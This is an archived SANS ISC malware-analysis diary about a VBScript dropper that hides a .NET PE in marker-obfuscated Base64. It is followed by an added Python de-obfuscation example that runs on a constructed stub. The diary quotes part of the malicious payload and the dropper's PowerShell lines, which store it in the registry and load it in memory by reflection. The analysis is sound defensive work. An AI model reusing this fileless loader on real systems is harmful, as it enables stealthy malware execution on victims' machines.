{
	"id": "3baa5a67-6d16-4ab4-92e7-4980a9bf86ea",
	"created_at": "2026-04-06T00:17:30.507749Z",
	"updated_at": "2026-04-10T13:12:07.475841Z",
	"deleted_at": null,
	"sha1_hash": "5240476ab8b5103b068116acc3544a7c438db28f",
	"title": "A VBScript with Obfuscated Base64 Data - SANS ISC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 879925,
	"plain_text": "A VBScript with Obfuscated Base64 Data - SANS ISC\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 18:17:04 UTC\r\nA few months ago, I posted a diary explaining how to search for (malicious) PE files in Base64 data[1]. Base64 is indeed a common way to distribute binary content in ASCII form, and plenty of scripts rely on this technique. On my MacBook, I use a small service created with Automator to automatically decode highlighted Base64 data and submit it to my Viper instance for further analysis.\r\nBut yesterday, I found on pastebin.com[2] a malicious WScript file with a Base64 string that did not decode: the decoder stopped with the error \"Invalid character in input stream\". A quick look at the script showed unexpected characters randomly spread through the Base64 data:\r\nH=\"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIb\r\ngBTM~*hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ~*KJAAAAAAAAABQRQAATAEDAGGnBFkAAAAAAAAAA\r\nOAAAgELAQsAALIAAAAIAAAAAAAAjtEAAAAgAAAA4AAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAAAgAQAAAgAAAAAAAAIAQI\r\nUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADTRAABXAAAAAOAAAPgEAAAAAAAAAAAAAAAAAAAAAAAAAAABAAwAAAD8zwA\r\nAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAA\r\nAC5~*ZXh~*AAAAlLEAAAAgAAAAsgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPgEAAAA4AAAAAYAAAC~*AAAAAAAAAAAAAA\r\nAAAABAAABAL...(redacted)\r\nIf you check the VBScript code, you'll indeed find an instruction that replaces those unexpected characters in the Base64 string:\r\n$_b=$_b.replace('~*','0');\r\nOnce the '~*' marker is replaced by '0' as stated in the script (replaced, not removed: the marker stands in for a Base64 character, so simply deleting it would shift and corrupt everything that follows), you get back the malicious PE file:\r\n$ sed \"s/\\~\\*/0/g\" base64.txt | base64 -d \u003e base64.exe\r\n$ file base64.exe\r\nbase64.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\n$ md5sum base64.exe\r\n07be65dedbee0ef5582f0eff5dd4d804 base64.exe\r\nThe file is, of course, malicious, as reported by VT[3].\r\nFinally, a quick remark about the script itself: it stores the payload in the Windows registry, then launches PowerShell to read it back, restore the Base64, and load the resulting .NET assembly in memory via reflection, without dropping the PE as a file on disk:\r\nO.regwrite D,H,\"REG_SZ\"\r\nO.Run C \u0026 chrw(34) \u0026 \"$_b = (get-itemproperty -path 'HKCU:\\SOFTWARE\\Microsoft\\' -name 'KeyName').KeyN\r\n$_b=$_b.replace('~*','0');\r\n[byte[]]$_0 = [System.Convert]::FromBase64String($_b);\r\n$_1 = [System.Threading.Thread]::GetDomain().Load($_0);\r\n$_1.EntryPoint.invoke($null,$null);\" \u0026 Chrw(34),0,false\r\nXavier Mertens (@xme)\r\nISC Handler - Freelance Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/rss/22590",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://isc.sans.edu/diary/rss/22590"
	],
	"report_names": [
		"22590"
	],
	"threat_actors": [],
	"ts_created_at": 1775434650,
	"ts_updated_at": 1775826727,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5240476ab8b5103b068116acc3544a7c438db28f.pdf",
		"text": "https://archive.orkl.eu/5240476ab8b5103b068116acc3544a7c438db28f.txt",
		"img": "https://archive.orkl.eu/5240476ab8b5103b068116acc3544a7c438db28f.jpg"
	}
}
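The replace-then-decode step the diary performs with `sed` and `base64 -d`, as an added Python example that is not part of the ISC diary or of the dropper it describes. It pulls the `(marker, replacement)` pair out of the dropper's own `.replace('~*','0')` call instead of hard-coding it, decodes with the same strictness as .NET's `FromBase64String` (so a leftover marker fails the way the author's decoder did), checks that the result carries an MZ header whose `e_lfanew` points at a `PE\0\0` signature, and hashes it. The sample payload is a constructed 152-byte PE header stub with the standard DOS header and stub (so its Base64 begins `TVqQAAMAAAAEAAAA//8AALgA...` like the real one); the function names, the `analyze` record layout and `SAMPLE_SCRIPT` are assumptions made for this example.

```python
"""Added example: undo marker-obfuscated Base64 (e.g. '~*' standing in for '0')
and sanity-check the decoded PE.  Not code from the ISC diary or the dropper."""
import base64
import binascii
import hashlib
import re
import struct
from typing import Optional, Tuple

# Pulls (marker, replacement) out of a PowerShell `.replace('x','y')` call so the
# decoder takes its parameters from the dropper itself rather than from a guess.
REPLACE_CALL = re.compile(r"\.replace\('([^']*)'\s*,\s*'([^']*)'\)", re.IGNORECASE)


def extract_replace_rule(script: str) -> Optional[Tuple[str, str]]:
    """Return (marker, replacement) from the first .replace('..','..') in the script."""
    m = REPLACE_CALL.search(script)
    return (m.group(1), m.group(2)) if m else None


def deobfuscate_base64(blob: str, marker: str, replacement: str) -> bytes:
    """Apply the dropper's own transform ($_b.replace(marker, replacement)) and decode.

    validate=True makes Python as strict as .NET's FromBase64String: any character
    outside the Base64 alphabet raises binascii.Error instead of being skipped.
    """
    cleaned = re.sub(r"\s+", "", blob)          # drop line-wrapping from the paste / PDF
    cleaned = cleaned.replace(marker, replacement)
    return base64.b64decode(cleaned, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Minimal PE check: 'MZ' stub and e_lfanew (offset 0x3C) pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def analyze(blob: str, marker: str, replacement: str) -> dict:
    """Decode and summarise; never raises, so a wrong rule shows up as a record, not a crash."""
    try:
        data = deobfuscate_base64(blob, marker, replacement)
    except (binascii.Error, ValueError) as exc:
        return {"decoded": False, "error": str(exc), "is_pe": False}
    return {
        "decoded": True,
        "size": len(data),
        "is_pe": looks_like_pe(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


# --- Constructed sample (assumption: not the diary's payload). A 152-byte PE header
# stub: standard 64-byte DOS header (e_lfanew = 0x80), the standard 64-byte DOS stub,
# then a PE signature and a COFF header for i386 with one section.
_DOS_HEADER = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00" + b"\x00" * 32
    + struct.pack("<I", 0x80)
)
_DOS_STUB = (
    b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
    + b"This program cannot be run in DOS mode.\r\r\n$" + b"\x00" * 7
)
_COFF = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0, 0)
SAMPLE_PE = _DOS_HEADER + _DOS_STUB + _COFF

# What the dropper would carry: the Base64 with every '0' swapped for the '~*' marker
# (the inverse of the $_b.replace('~*','0') on the page).
SAMPLE_OBFUSCATED = base64.b64encode(SAMPLE_PE).decode().replace("0", "~*")

# The dropper's PowerShell as quoted on the page, registry read elided (constructed).
SAMPLE_SCRIPT = "$_b=$_b.replace('~*','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);"


if __name__ == "__main__":
    rule = extract_replace_rule(SAMPLE_SCRIPT)
    print("rule taken from script:", rule)
    print("raw blob (marker left in):", analyze(SAMPLE_OBFUSCATED, "~*", "~*"))
    print("marker stripped, not replaced:", analyze(SAMPLE_OBFUSCATED, "~*", ""))
    print("script's own rule:", analyze(SAMPLE_OBFUSCATED, *rule))
```

Decoding with the marker left in fails with "Non-base64 digit found", the Python counterpart of the "Invalid character in input stream" the author hit; stripping the marker instead of substituting it leaves a string whose length no longer fits the Base64 framing, so it fails too; only the script's own rule yields a blob that passes the MZ/PE check. The header check is deliberately minimal: it confirms the substitution was right, it does not parse the PE, so hand the recovered bytes to a real PE parser or sandbox afterwards.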